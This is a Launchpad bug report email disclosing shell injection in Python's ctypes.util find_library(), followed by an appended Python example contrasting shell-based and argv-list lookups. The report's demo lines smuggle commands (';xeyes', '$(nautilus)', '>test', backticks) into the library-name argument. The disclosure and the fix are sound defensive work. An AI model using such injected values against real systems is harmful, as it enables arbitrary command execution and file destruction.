Public bug reported:

https://github.com/Legrandin/ctypes/issues/1

The find_library() function can execute code when special chars like ;|`<>$ are 
in the name.
The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

Demo Exploits for Linux :
====================

>>> from ctypes.util import find_library
>>> find_library(";xeyes")                    # runs  xeyes 
>>> find_library("|xterm")                    # runs terminal
>>> find_library("&gimp")                    # runs gimp
>>> find_library("$(nautilus)")              # runs filemanager
>>> find_library(">test")                       # creates, and if exists, erases a file "test"

==== Traceback ====

>>> find_library("`xmessage hello`")    # shows a message, press ctrl+c for Traceback
^CTraceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
    return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
  File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
    trace = f.read()
KeyboardInterrupt

ProblemType: Bug
DistroRelease: Ubuntu 15.10
Package: libpython2.7-stdlib 2.7.10-4ubuntu1
ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
Uname: Linux 4.2.0-16-generic x86_64
ApportVersion: 2.19.1-0ubuntu4
Architecture: amd64
CurrentDesktop: XFCE
Date: Sun Nov  1 10:34:38 2015
InstallationDate: Installed on 2015-10-09 (22 days ago)
InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
SourcePackage: python2.7
UpgradeStatus: No upgrade log present (probably fresh install)

** Affects: python2.7 (Ubuntu)
     Importance: Undecided
         Status: New


** Tags: amd64 apport-bug wily

** Attachment removed: "JournalErrors.txt"
   
https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068/+attachment/4510277/+files/JournalErrors.txt

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
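
The fix the report asks for, shown as an added example; it is not code from the report or from CPython's util.py. `echo` is a constructed stand-in for the external tool, `subprocess.run` is used as the convenience wrapper around `subprocess.Popen`, and the function names and the allowlist pattern are assumptions made for illustration.

```python
import re
import subprocess

# Constructed stand-in for the external tool that util.py runs; "echo" only
# prints its arguments, which makes the effect of each calling style visible.
TOOL = "echo"


def lookup_with_shell(name):
    """Pattern from the report: name is formatted into a string run by /bin/sh."""
    cmd = "%s -l%s" % (TOOL, name)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout.splitlines()


def lookup_without_shell(name):
    """Suggested pattern: argv list, no shell, so name stays one literal argument."""
    proc = subprocess.run([TOOL, "-l" + name], capture_output=True, text=True)
    return proc.stdout.splitlines()


# Hypothetical allowlist for library names (an assumption, not from the report),
# applied before any lookup as a second layer of defence.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.+-]+")


def is_plain_library_name(name):
    return SAFE_NAME.fullmatch(name) is not None


if __name__ == "__main__":
    probe = ";echo INJECTED"  # constructed input with a harmless marker
    print(lookup_with_shell(probe))      # the shell splits at ';' and runs both parts
    print(lookup_without_shell(probe))   # the tool receives the text as data
    print(is_plain_library_name(probe), is_plain_library_name("ssl"))
```

With the argv-list form the metacharacters reach the tool as ordinary bytes of one argument, so nothing on the system interprets them as shell syntax.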
